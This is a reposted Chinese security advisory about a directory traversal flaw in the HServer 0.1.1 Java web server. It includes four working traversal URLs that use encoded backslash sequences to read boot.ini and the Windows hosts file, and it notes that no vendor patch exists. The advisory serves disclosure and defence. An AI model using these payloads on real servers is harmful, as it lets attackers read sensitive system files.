发布日期:2012-01-05
更新日期:2012-01-06受影响系统:
HServer HServer 0.1.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51286HServer Webserver是用Java写的小型Web服务器。HServer Webserver在实现上存在目录遍历漏洞,成功利用此漏洞可允许攻击者查看服务器中的任意文件,泄露敏感信息。<*来源:demonalex
链接:http://marc.info/?l=bugtraq&m=132577808701640&w=2
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/..%5c..%5c..%5cboot.ini
http://www.example.com/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://www.example.com/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts建议:
--------------------------------------------------------------------------------
厂商补丁:HServer
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.luizpicanco.com/index.php?s=hserver多网站用户密码库被爆破解 用户资料遭泄密Mozilla Firefox拖放同源策略安全限制绕过漏洞相关资讯 HServer Webserver 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|
易网时代-编程资源站